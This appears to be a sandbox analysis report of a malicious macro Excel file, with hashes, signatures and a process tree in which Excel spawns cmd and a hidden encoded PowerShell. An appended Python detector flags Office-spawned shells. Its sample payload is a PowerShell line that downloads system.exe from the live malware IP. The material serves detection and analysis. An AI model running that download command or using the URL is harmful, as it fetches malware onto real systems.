Analysis
max time kernel: 122s
max time network: 129s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 21-11-2024 22:32
Static task: static1
Behavioral task: behavioral1
  Sample: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
  Resource: win10v2004-20241007-en
General
Target: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Size: 14KB
MD5: 70820ac2bb527bb0a10747a06d2c2b0b
SHA1: 7289b7ddcdcaa9450c27e1579f36d67a544cee80
SHA256: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
SHA512: 64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
SSDEEP: 384:A0z+vPw85+pkQ1z7fMc+8Pty4jZwENYBp7zMLmh:p+3ZgkKzDMCXjZwENmdKk
Malware Config
Extracted URL: http://84.252.122.205/xcx/system.exe
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 2108 | 1840 | cmd.exe | 30
Blocklisted process makes network request (1 IoC)
flow | pid | Process
4 | 2100 | powershell.exe
Deletes itself (1 IoC)
pid | Process
1840 | EXCEL.EXE
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Every process in the chain, Excel included, reads this key, so on its own this hit is weak evidence; it is listed because it maps to an ATT&CK technique, not because it separates this sample from benign activity.
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry (2 TTPs, 1 IoC)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
NTFS ADS (1 IoC)
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Temp\53F67F00\:Zone.Identifier:$DATA | EXCEL.EXE
The Zone.Identifier stream is the Mark-of-the-Web. Office writing it under its own Temp directory while handling a file that carries the Internet zone is routine, so this hit records the file's origin rather than showing malicious use of alternate data streams by itself.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
1840 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (1 IoC)
pid | Process
2100 | powershell.exe
Suspicious behavior: RenamesItself (1 IoC)
pid | Process
1840 | EXCEL.EXE
Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 2100 | powershell.exe
Suspicious use of SetWindowsHookEx (3 IoCs)
pid | Process
1840 | EXCEL.EXE (recorded 3 times)
Suspicious use of WriteProcessMemory (8 IoCs)
description | pid | Process | procid_target
PID 1840 wrote to memory of 2108 | 1840 | EXCEL.EXE | 31 (recorded 4 times)
PID 2108 wrote to memory of 2100 | 2108 | cmd.exe | 33 (recorded 4 times)
Processes
1. C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 1840)
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
   - Deletes itself
   - System Location Discovery: System Language Discovery
   - Enumerates system info in registry
   - NTFS ADS
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious behavior: RenamesItself
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe (PID 2108, parent 1840)
      Command line: cmd /c Cxrgbutjpc.bat
      - Process spawned unexpected child process
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2100, parent 2108)
         Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc [encoded command not shown on this page]
         - Blocklisted process makes network request
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
The chain is Excel running the document, cmd.exe executing a batch file by relative name (Cxrgbutjpc.bat), and PowerShell started with a hidden window (-win 1 is WindowStyle Hidden) and an encoded command; the blocklisted network request is attributed to that PowerShell process. The image paths under SysWOW64 while the command lines name System32 are WOW64 file-system redirection for 32-bit Office (Office14 under Program Files (x86)) and the 32-bit children it creates, not a substituted binary.
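The chain above (Excel -> cmd.exe -> powershell.exe -enc) is the pattern the "Process spawned unexpected child process" signature fires on, and the encoded PowerShell argument is where the network activity lives. As an added example that is not part of this report or of any sandbox's code, the Python below walks a list of process records, flags every shell or script host that has an Office application anywhere in its ancestry, and decodes a PowerShell -enc argument (Base64 of a UTF-16LE string) to pull URLs out of it. The process records are constructed from the PIDs and command lines shown above; the encoded payload is a constructed stand-in built around the URL extracted from the sample's configuration, because the real encoded command is not shown on this page; the OFFICE_PARENTS and SHELLS sets are assumptions to tune for your environment.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed lists: parents that have no business spawning shells, and the shells/script hosts to flag.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        # Compare on the basename so SysWOW64/System32 redirection does not matter.
        return self.image.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -enc/-EncodedCommand argument.

    The argument is Base64 of a UTF-16LE string. Returns None when there is
    no such argument or it does not decode cleanly.
    """
    m = re.search(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(by_pid: Dict[int, Proc], pid: int) -> List[Proc]:
    """[process, parent, grandparent, ...] up to the root we have a record for."""
    chain: List[Proc] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:  # guard against PID reuse loops
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return chain


def find_office_spawned_shells(procs: List[Proc]) -> List[dict]:
    """Flag every shell/script host with an Office application in its ancestry."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        if p.name not in SHELLS:
            continue
        chain = ancestry(by_pid, p.pid)
        office = next((a for a in chain[1:] if a.name in OFFICE_PARENTS), None)
        if office is None:
            continue
        decoded = decode_encoded_command(p.cmdline) if p.name == "powershell.exe" else None
        hits.append({
            "pid": p.pid,
            "process": p.name,
            "office_ancestor": office.name,
            "chain": " -> ".join(a.name for a in reversed(chain)),
            "decoded": decoded,
            "urls": re.findall(r"https?://[^\s'\"<>]+", decoded or ""),
        })
    return hits


# Constructed records modelled on the report's process tree. The -enc payload is a
# constructed stand-in (the real one is not shown on the page), written so that it
# references the URL the sandbox extracted from the sample's configuration.
SAMPLE_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://84.252.122.205/xcx/system.exe', \"$env:TEMP\\system.exe\")"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_PROCS = [
    Proc(1840, None, r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\sample.xlsm'),
    Proc(2108, 1840, r"C:\Windows\SysWOW64\cmd.exe", "cmd /c Cxrgbutjpc.bat"),
    Proc(2100, 2108, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -win 1 -enc " + SAMPLE_ENC),
]

if __name__ == "__main__":
    for hit in find_office_spawned_shells(SAMPLE_PROCS):
        print(f"[{hit['pid']}] {hit['chain']}")
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
            print("    urls:   ", hit["urls"])
```

Matching on the image basename rather than the full path is deliberate: as the process list above shows, a 32-bit parent reports SysWOW64 images even when the command line says System32, and a path-anchored rule would miss that. The ancestry walk, rather than a direct parent check, also catches the case here where PowerShell's immediate parent is cmd.exe and Excel is one level further up.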
TTP mapping: MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
  Filesize: 21KB
  MD5: 3a37982a36a3e286c391ec4c915a14f8
  SHA1: b200610c40d68db675d1d22ba3ccbcd25e8597b9
  SHA256: cdc2c1721db1db71374fa8cbaae0aa916feb77dc53d8a30b15acbefd7b5e6419
  SHA512: f303c35aa44e1ace057eb48dd94184ebe6b56adf8f2be9b8a5c98a9ebd5c1a1c51d1e42844223df2c717d0042ee8c6f38af5a1bcba6bc38e6cf35a23a4ccc23d
  This is the same path as the submitted sample but 21KB rather than 14KB with different hashes, so it is the file as rewritten by Excel during the run (compare the "Deletes itself" and "RenamesItself" signatures), not the original sample.
(path not shown on this page)
  Filesize: 587B
  MD5: 31814477e987cc1e94638caa7f39f293
  SHA1: c3814edcc331117303ced19f53006a4ecd09a833
  SHA256: de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
  SHA512: 09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268